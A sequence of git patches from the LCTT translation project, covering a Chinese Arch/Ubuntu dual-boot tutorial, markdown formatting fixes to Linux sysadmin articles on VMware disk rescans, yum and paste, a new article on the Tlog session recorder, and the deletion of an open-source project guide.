+如果因特网运行正常,你应该得到一个回显,显示发送和接收的数据包的数量。在这种情况下,我们发送了4个回波,并得到了4个反馈,这意味着连接是正常的。
+
+如果想在 Arch Linux 中设置 Wifi,请阅读[本文][19],在 Arch Linux 中配置 Wifi。
+接下来,我们需要选择之前在安装 Ubuntu 时预留出的空闲分区。
+```fdisk -l``
+
+上面的命令应该显示可用的磁盘分区在哪里。您应该能看到 Ubuntu 分区以及预留的空闲空间。我们将使用`cfdisk`命令进行分区。
+```cfdisk```
+
+ [![利用cfdisk命令安装 Ach 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png)][20]
+
+执行命令后将看到分区情况。选择其他已分配分区下面的空闲空间。
+您需要选择 `New`,然后输入分区大小。
+ [![为 Archlinux 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png)][21] 例如,9.3G - G 表示千兆字节。[![安装 Arch Linux 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png)][22]
+
+如下图所示,选择`primary`进行分区
+ [![将 Arch Linux 的根(root)分区设置成主分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png)][23] 然后选择写分区条目。 [![选择分区安装 Arch](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png)][24]
+
+键入`yes`,以确认写入分区表。
+ [![确认创建分区并安装 Arch Linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png)][25]
+
+然后选择 `Quit`(退出)选项。
+ [![退出 Arch Linux 的‘cfdisk’](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png)][26] 然后键入:
+
+```fdisk -l```
+
+确认修改
+ [![确认分区修改](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png)][27]
+
+然后使用磁盘分区命令:
+```mkfs.ext4 /dev/sda3```
+
+确保您选择的分区是我们创建的最后一个分区,这样我们就不会破坏 Ubuntu 分区。
+ [![完成 Arch Linux 分区安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png)][28]
+
+然后使用以下命令安装这个分区 -
+```mount /dev/sda3 /mnt```
+
+ [![安装基础分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-base-partition-in-arch-linux.png?1514472693)][29]
+
+用下面命令创建`home`目录
+```mkdir .mnt/home```
+
+ [![安装家目录](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-home-partition-arch-linux.png?1514472866)][30]
+
+用一下命令安装`home`目录到这个分区上
+mount /dev/sda3 /mnt/home
+
+ [![安装家目录](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/make-mount-home-directory.png?1514472960)][31]
+
+现在使用以下命令安装 Archlinux 的基本系统:
+```pacstrap /mnt base```
+
+请确保网络连接正常。
+
+
+接下来开始下载和配置安装所用时间取决于你的网速。
+ [![安装Arch Linux 基础系统](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/install-arch-linux-base.png?1514473056)][32]
+
+这一步骤完成后,将完成 Archlinux 基本安装。
+Arch Linux 基础系统安装完成后,使用以下命令创建一个`fstab`文件:
+genfstab -U /mnt >> /mnt/etc/fstab
+
+ [![创建 fstab文件](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/create-fstab-file-in-arch-linux.png?1514473226)][33]
+
+在此之后,您需要验证`fstab`文件,使用下面命令:
+```cat /mnt/etc/fstab```
+
+ [![查看fstab文件的终端显示](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/cat-fstab-file-data-terminal.png?1514473304)][34]
+
+### Configuring Arch Linux: the basic configuration配置 Arch Linux:基础配置
+
+您将需要在安装时配置以下内容:
+1. 系统语言和系统语言环境
+
+2. 系统时区
+
+3. Root用户密码
+
+4. 设置主机名
+
+Firstly, you will need to switch to the newly installed base by changing root into the system using the command:
+首先,您需要使用以下命令将`root`切换为新安装的基础系统用户:
+```arch-chroot /mnt```
+
+#### 系统语言和系统语言环境
+
+然后必须配置系统语言。必须取消对 en_Utf-8 UTF-8的注释,并加载到文件`/etc/local.gen`中
+键入:
+
+```nano /etc/local.gen```
+
+然后将 en_UTF-8 UTF-8 取消注释
+键入命令:
+
+```locale-gen```
+
+生成本地化设置如下:
+ [![生成本地化配置](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/generate-localization-arch-linux.png?1514473406)][35] 相应的需要在`locale.conf`文件中配置 LANG 变量。例如:
+
+```nano /etc/locale.conf```
+
+修改为:
+```LANG=en_US.UTF-8```
+
+配置键盘布局,则在文件`vconsole.conf`中进行更改,如下操作:
+```nano /etc/vconsole.conf```
+
+修改为:
+```KEYMAP=us-eng```
+
+#### 2\. 系统时区
+
+配置时区需要利用一下命令实现
+```ln -sf /usr/share/zoneinfo/Region/City /etc/localtime```
+
+要查看可用时区,可以在终端使用以下命令:
+
+注意可选时区在屏幕截图中显示为蓝色:
+```ls /usr/share/zoneinfo```
+
+ [![配置时区文件](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-zonefile-in-arch-linux.png?1514473483)][36] [![配置地区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png)][37] 运行`hwclock`命令来生成``/etc/adjtime``(假设硬件时钟被设置为UTC):
+
+```# hwclock --systohc```
+
+#### 3\. 配置 Root 用户密码
+
+要为 Arch Linux 系统用户`root`设置密码,请使用:
+```Passwd```
+
+为`root`用户提供一个新的密码并确认密码使其生效。
+ [![配置系统用户root密码](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-arch-linux-root-password.png?1514473649)][38]
+
+#### 4\. 配置主机名和网络
+
+需要创建主机名文件:
+```nano /etc/hostname```
+
+ [![配置主机名](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-hostname.png?1514473741)][39]
+
+将名字更改为您的用户名:
+ [![set arch linux username](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-username.png?1514473822)][40] 然后向主机添加一个匹配的条目:
+
+```nano /etc/hosts
+
+127.0.0.1 localhost.localdomain localhost
+
+::1 localhost.localdomain localhost
+
+127.0.1.1 LinuxandUbuntu.localdomain LinuxandUbuntu```
+
+
+
+您需要使网络保持连接,然后使用:
+```systemctl enable dhcpd```
+
+#### 配置 Grub
+
+然后重启机器,进入 Ubuntu 配置 grub。
+你可以键入:
+```reboot```
+
+ [![安装完成后重启](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/reboot-system-after-arch-linux-installation.png?1514474180)][41]
+
+Arch Linux 安装仍然没有出现,因此我们需要在 Ubuntu 中使用 `update-grub`来安装它。
+ [![Ubuntu grub 菜单](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/ubuntu-grub-menu.png?1514474302)][42] 在Ubuntu中打开终端,输入:
+
+```sudo update-grub```
+
+它应该更新grub,添加 Arch Linux 记录。
+### 小结
+
+祝贺您成功地将Ubuntu和Arch Linux设置为双引导。Ubuntu安装很简单,但是Arch Linux安装对新的Linux用户来说是一个挑战。我试着让这个教程变得简单。但是如果你对这篇文章有任何疑问,请在评论部分告诉我。还可以与您的朋友分享这篇文章,并帮助他们学习Linux。
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/dual-boot-ubuntu-and-arch-linux
+
+作者:[LinuxAndUbuntu][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/home/etcher-burn-images-to-sd-card-make-bootable-usb
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg
+[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg
+[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg
+[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg
+[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg
+[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg
+[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg
+[13]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg
+[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg
+[15]:http://www.linuxandubuntu.com/home/arch-linux-take-your-linux-knowledge-to-next-level-review
+[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg
+[17]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png
+[18]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png
+[19]:http://www.linuxandubuntu.com/home/how-to-setup-a-wifi-in-arch-linux-using-terminal
+[20]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png
+[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png
+[22]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png
+[23]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png
+[24]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png
+[25]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png
+[26]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png
+[27]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png
+[28]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png
+[29]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-base-partition-in-arch-linux.png
+[30]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-home-partition-arch-linux.png
+[31]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/make-mount-home-directory.png
+[32]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/install-arch-linux-base.png
+[33]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/create-fstab-file-in-arch-linux.png
+[34]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/cat-fstab-file-data-terminal.png
+[35]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/generate-localization-arch-linux.png
+[36]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-zonefile-in-arch-linux.png
+[37]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png
+[38]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-arch-linux-root-password.png
+[39]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-hostname.png
+[40]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-username.png
+[41]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/reboot-system-after-arch-linux-installation.png
+[42]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/ubuntu-grub-menu.png
From 6f79ed8ca98bfeda64e1377da842dd96f7a99ab9 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 7 Jan 2018 18:05:24 +0800
Subject: [PATCH 139/371] =?UTF-8?q?=E4=BF=AE=E6=94=B9md=E6=A0=BC=E5=BC=8F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a New Hard Disk Without Rebooting Guest.md | 55 +++++++++++++++----
1 file changed, 45 insertions(+), 10 deletions(-)
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index e0745af406..0845866f51 100644
--- a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,6 +1,8 @@
translating by lujun9972
+
Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
======
+
As a system admin, I need to use additional hard drives for to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest using VMWare software running Linux as guest.
It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus without rebooting a running Linux VM guest. This how to is tested under Vmware Server and Vmware Workstation v6.0 (but should work with older version too). All instructions are tested on RHEL, Fedora, CentOS and Ubuntu Linux guest / hosts operating systems.
@@ -39,23 +41,37 @@ Finally, set file location and click on Finish.
## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
A rescan can be issued by typing the following command:
-`echo "- - -" > /sys/class/scsi_host/ **host#** /scan
+
+```
+echo "- - -" > /sys/class/scsi_host/ **host#** /scan
fdisk -l
-tail -f /var/log/message`
+tail -f /var/log/message
+```
+
Sample outputs:
+
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
+
Replace host# with actual value such as host0. You can find scsi_host value using the following command:
+
`# ls /sys/class/scsi_host`
+
Output:
+
```
host0
```
Now type the following to send a rescan request:
-`echo "- - -" > /sys/class/scsi_host/ **host0** /scan
+
+```
+echo "- - -" > /sys/class/scsi_host/ **host0** /scan
fdisk -l
-tail -f /var/log/message`
+tail -f /var/log/message
+```
+
Sample Outputs:
+
```
Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
@@ -96,12 +112,16 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
### How Do I Delete a Single Device Called /dev/sdc?
In addition to re-scanning the entire bus, a specific device can be added or existing device deleted using the following command:
-`# echo 1 > /sys/block/devName/device/delete
-# echo 1 > /sys/block/ **sdc** /device/delete`
+
+```
+# echo 1 > /sys/block/devName/device/delete
+# echo 1 > /sys/block/ **sdc** /device/delete
+```
### How Do I Add a Single Device Called /dev/sdc?
To add a single device explicitly, use the following syntax:
+
```
# echo "scsi add-single-device " > /proc/scsi/scsi
```
@@ -116,10 +136,15 @@ Where,
For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
-`# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
+
+```
+# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
# fdisk -l
-# cat /proc/scsi/scsi`
+# cat /proc/scsi/scsi
+```
+
Sample Outputs:
+
```
Attached devices:
Host: scsi0 Channel: 00 Id: 00 Lun: 00
@@ -136,23 +161,31 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
## Step #3: Format a New Disk
Now, you can create partition using [fdisk and format it using mkfs.ext3][8] command:
-`# fdisk /dev/sdc
+
+```
+# fdisk /dev/sdc
### [if you want ext3 fs] ###
# mkfs.ext3 /dev/sdc3
### [if you want ext4 fs] ###
-# mkfs.ext4 /dev/sdc3`
+# mkfs.ext4 /dev/sdc3
+```
## Step #4: Create a Mount Point And Update /etc/fstab
`# mkdir /disk3`
+
Open /etc/fstab file, enter:
+
`# vi /etc/fstab`
+
Append as follows:
+
```
/dev/sdc3 /disk3 ext3 defaults 1 2
```
For ext4 fs:
+
```
/dev/sdc3 /disk3 ext4 defaults 1 2
```
@@ -162,7 +195,9 @@ Save and close the file.
#### Optional Task: Label the partition
[You can label the partition using e2label command][9]. For example, if you want to label the new partition /backupDisk, enter
+
`# e2label /dev/sdc1 /backupDisk`
+
See "[The importance of Linux partitions][10]
## about the author
From e9a67e5ae1ede0d5762f178dbdce5160653126b6 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 7 Jan 2018 18:12:15 +0800
Subject: [PATCH 140/371] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?=
=?UTF-8?q?=E7=B2=97=E6=97=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
代码高亮和换行
---
... is package installed to on CentOS-RHEL.md | 20 +++++++++++++++++--
1 file changed, 18 insertions(+), 2 deletions(-)
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index b0805e08ec..01fe3928ce 100644
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -16,13 +16,18 @@ yum is similar to other high level package managers like [apt-get command][3]/[a
### yum where is package installed
The syntax is as follows to install htop package for a demo purpose:
+
`# yum install htop`
+
To list the files installed by a yum package called htop, run the following rpm command:
+
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
+
Sample outputs:
+
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
@@ -38,9 +43,11 @@ Sample outputs:
### How to see the files installed by a yum package using repoquery command
First install yum-utils package using [yum command][2]:
+
```
# yum install yum-utils
```
+
Sample outputs:
```
@@ -102,15 +109,24 @@ Complete!
### How do I list the contents of a installed package using YUM?
Now run repoquery command as follows:
+
`# repoquery --list htop`
+
OR
+
`# repoquery -l htop`
+
Sample outputs:
+
[![yum where is package installed][5]][5]
+
You can also use the type command or command command to just find location of given binary file such as httpd or htop:
-`$ type -a httpd
+
+```
+$ type -a httpd
$ type -a htop
-$ command -V htop`
+$ command -V htop
+```
### about the author
From f78e406b7cb20b7b00e96c02287ff0e103396b1a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:41:23 +0800
Subject: [PATCH 141/371] =?UTF-8?q?=E4=BB=A3=E7=A0=81=E9=AB=98=E4=BA=AE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... paste Command Explained For Beginners (5 Examples).md | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
index c48115f050..49b1dc763b 100644
--- a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -37,7 +37,9 @@ Sometimes, there can be a requirement to add a delimiting character between entr
For example, to apply a colon (:) as a delimiting character, use the paste command in the following way:
+```
paste -d : file1.txt file2.txt file3.txt
+```
Here's the output this command produced on our system:
@@ -49,7 +51,9 @@ By default, the paste command merges lines in a way that entries in the first co
This you can do using the **-s** command line option.
+```
paste -s file1.txt file2.txt file3.txt
+```
Following is the output:
@@ -59,7 +63,9 @@ Following is the output:
Yes, you can use multiple delimiters as well. For example, if you want to use both : and |, you can do that in the following way:
+```
paste -d ':|' file1.txt file2.txt file3.txt
+```
Following is the output:
@@ -69,7 +75,9 @@ Following is the output:
By default, lines merged through paste end in a newline. However, if you want, you can make them NUL terminated, something which you can do using the **-z** option.
+```
paste -z file1.txt file2.txt file3.txt
+```
### Conclusion
From 83c2c2507d103f08b866dd4a4bb685479002af08 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:42:05 +0800
Subject: [PATCH 142/371] add done: 20180105 Linux paste Command Explained For
Beginners (5 Examples).md
---
... Linux paste Command Explained For Beginners (5 Examples).md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
index 49b1dc763b..b426279815 100644
--- a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -9,7 +9,9 @@ But before we do that, it's worth mentioning that all examples mentioned in this
As already mentioned above, the paste command merges lines of files. Here's the tool's syntax:
+```
paste [OPTION]... [FILE]...
+```
And here's how the mage of paste explains it:
```
From 479069acaf044e2fa0fd1ed269115d09d513a119 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:59:58 +0800
Subject: [PATCH 143/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Tlog=20-=20A=20To?=
=?UTF-8?q?ol=20to=20Record=20/=20Play=20Terminal=20IO=20and=20Sessions?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Record - Play Terminal IO and Sessions.md | 92 +++++++++++++++++++
1 file changed, 92 insertions(+)
create mode 100644 sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
diff --git a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
new file mode 100644
index 0000000000..09ed8ec879
--- /dev/null
+++ b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
@@ -0,0 +1,92 @@
+Tlog - A Tool to Record / Play Terminal IO and Sessions
+======
+Tlog is a terminal I/O recording and playback package for Linux Distros. It's suitable for implementing centralized user session recording. It logs everything that passes through as JSON messages. The primary purpose of logging in JSON format is to eventually deliver the recorded data to a storage service such as Elasticsearch, where it can be searched and queried, and from where it can be played back. At the same time, they retain all the passed data and timing.
+
+Tlog contains three tools namely tlog-rec, tlog-rec-session and tlog-play.
+
+ * `Tlog-rec tool` is used for recording terminal input or output of programs or shells in general.
+ * `Tlog-rec-session tool` is used for recording I/O of whole terminal sessions, with protection from recorded users.
+ * `Tlog-play tool` for playing back the recordings.
+
+
+
+In this article, I'll explain how to install Tlog on a CentOS 7.4 server.
+
+### Installation
+
+Before proceeding with the install, we need to ensure that our system meets all the software requirements for compiling and installing the application. On the first step, update your system repositories and software packages by using the below command.
+```
+#yum update
+```
+
+We need to install the required dependencies for this software installation. I've installed all dependency packages with these commands prior to the installation.
+```
+#yum install wget gcc
+#yum install systemd-devel json-c-devel libcurl-devel m4
+```
+
+After completing these installations, we can download the [source package][1] for this tool and extract it on your server as required:
+```
+#wget https://github.com/Scribery/tlog/releases/download/v3/tlog-3.tar.gz
+#tar -xvf tlog-3.tar.gz
+# cd tlog-3
+```
+
+Now you can start building this tool using our usual configure and make approach.
+```
+#./configure --prefix=/usr --sysconfdir=/etc && make
+#make install
+#ldconfig
+```
+
+Finally, you need to run `ldconfig`. It creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file /etc/ld.so.conf, and in the trusted directories (/lib and /usr/lib).
+
+### Tlog workflow chart
+
+![Tlog working process][2]
+
+Firstly, a user authenticates to login via PAM. The Name Service Switch (NSS) provides the information as `tlog` is a shell to the user. This initiates the tlog section and it collects the information from the Env/config files about the actual shell and starts the actual shell in a PTY. Then it starts logging everything passing between the terminal and the PTY via syslog or sd-journal.
+
+### Usage
+
+You can test if session recording and playback work in general with a freshly installed tlog, by recording a session into a file with `tlog-rec` and then playing it back with `tlog-play`.
+
+#### Recording to a file
+
+To record a session into a file, execute `tlog-rec` on the command line as such:
+```
+tlog-rec --writer=file --file-path=tlog.log
+```
+
+This command will record our terminal session to a file named tlog.log and save it in the path specified in the command.
+
+#### Playing back from a file
+
+You can playback the recorded session during or after recording using `tlog-play` command.
+```
+tlog-play --reader=file --file-path=tlog.log
+```
+
+This command reads the previously recorded file tlog.log from the file path mentioned in the command line.
+
+### Wrapping up
+
+Tlog is an open-source package which can be used for implementing centralized user session recording. This is mainly intended to be used as part of a larger user session recording solution but is designed to be independent and reusable.This tool can be a great help for recording everything users do and store it somewhere on the server side safe for the future reference. You can get more details about this package usage in this [documentation][3]. I hope this article is useful to you. Please post your valuable suggestions and comments on this.
+
+### About Saheetha Shameer(the author)
+I'M Working As A Senior System Administrator. I'M A Quick Learner;Have A Slight Inclination Towards Following The Current;Emerging Trends In The Industry. My Hobbies Include Hearing Music;Playing Strategy Computer Games;Reading;Gardening. I Also Have A High Passion For Experimenting With Various Culinary Delights;
+
+--------------------------------------------------------------------------------
+
+via: https://linoxide.com/linux-how-to/tlog-tool-record-play-terminal-io-sessions/
+
+作者:[Saheetha Shameer][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linoxide.com/author/saheethas/
+[1]:https://github.com/Scribery/tlog/releases/download/v3/tlog-3.tar.gz
+[2]:https://linoxide.com/wp-content/uploads/2018/01/Tlog-working-process.png
+[3]:https://github.com/Scribery/tlog/blob/master/README.md
From 76f4518296583a95e17b0f6f43c4a72e2e9bce11 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:38:55 +0800
Subject: [PATCH 144/371] Delete 20171201 Launching an Open Source Project A
Free Guide.md
---
...ing an Open Source Project A Free Guide.md | 87 -------------------
1 file changed, 87 deletions(-)
delete mode 100644 sources/tech/20171201 Launching an Open Source Project A Free Guide.md
diff --git a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
deleted file mode 100644
index dd41e57813..0000000000
--- a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
+++ /dev/null
@@ -1,87 +0,0 @@
-translating by CYLeft
-
-Launching an Open Source Project: A Free Guide
-============================================================
-
-![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/project-launch-1024x645.jpg)
-
-Launching a project and then rallying community support can be complicated, but the new guide to Starting an Open Source Project can help.
-
-Increasingly, as open source programs become more pervasive at organizations of all sizes, tech and DevOps workers are choosing to or being asked to launch their own open source projects. From Google to Netflix to Facebook, companies are also releasing their open source creations to the community. It’s become common for open source projects to start from scratch internally, after which they benefit from collaboration involving external developers.
-
-Launching a project and then rallying community support can be more complicated than you think, however. A little up-front work can help things go smoothly, and that’s exactly where the new guide to[ Starting an Open Source Project][1] comes in.
-
-This free guide was created to help organizations already versed in open source learn how to start their own open source projects. It starts at the beginning of the process, including deciding what to open source, and moves on to budget and legal considerations, and more. The road to creating an open source project may be foreign, but major companies, from Google to Facebook, have opened up resources and provided guidance. In fact, Google has[ an extensive online destination][2] dedicated to open source best practices and how to open source projects.
-
-“No matter how many smart people we hire inside the company, there’s always smarter people on the outside,” notes Jared Smith, Open Source Community Manager at Capital One. “We find it is worth it to us to open source and share our code with the outside world in exchange for getting some great advice from people on the outside who have expertise and are willing to share back with us.”
-
-In the new guide, noted open source expert Ibrahim Haddad provides five reasons why an organization might open source a new project:
-
-1. Accelerate an open solution; provide a reference implementation to a standard; share development costs for strategic functions
-
-2. Commoditize a market; reduce prices of non-strategic software components.
-
-3. Drive demand by building an ecosystem for your products.
-
-4. Partner with others; engage customers; strengthen relationships with common goals.
-
-5. Offer your customers the ability to self-support: the ability to adapt your code without waiting for you.
-
-The guide notes: “The decision to release or create a new open source project depends on your circumstances. Your company should first achieve a certain level of open source mastery by using open source software and contributing to existing projects. This is because consuming can teach you how to leverage external projects and developers to build your products. And participation can bring more fluency in the conventions and culture of open source communities. (See our guides on [Using Open Source Code][3] and [Participating in Open Source Communities][4]) But once you have achieved open source fluency, the best time to start launching your own open source projects is simply ‘early’ and ‘often.’”
-
-The guide also notes that planning can keep you and your organization out of legal trouble. Issues pertaining to licensing, distribution, support options, and even branding require thinking ahead if you want your project to flourish.
-
-“I think it is a crucial thing for a company to be thinking about what they’re hoping to achieve with a new open source project,” said John Mertic, Director of Program Management at The Linux Foundation. “They must think about the value of it to the community and developers out there and what outcomes they’re hoping to get out of it. And then they must understand all the pieces they must have in place to do this the right way, including legal, governance, infrastructure and a starting community. Those are the things I always stress the most when you’re putting an open source project out there.”
-
-The[ Starting an Open Source Project][5] guide can help you with everything from licensing issues to best development practices, and it explores how to seamlessly and safely weave existing open components into your open source projects. It is one of a new collection of free guides from The Linux Foundation and The TODO Group that are all extremely valuable for any organization running an open source program.[ The guides are available][6]now to help you run an open source program office where open source is supported, shared, and leveraged. With such an office, organizations can establish and execute on their open source strategies efficiently, with clear terms.
-
-These free resources were produced based on expertise from open source leaders.[ Check out all the guides here][7] and stay tuned for our continuing coverage.
-
-Also, don’t miss the previous articles in the series:
-
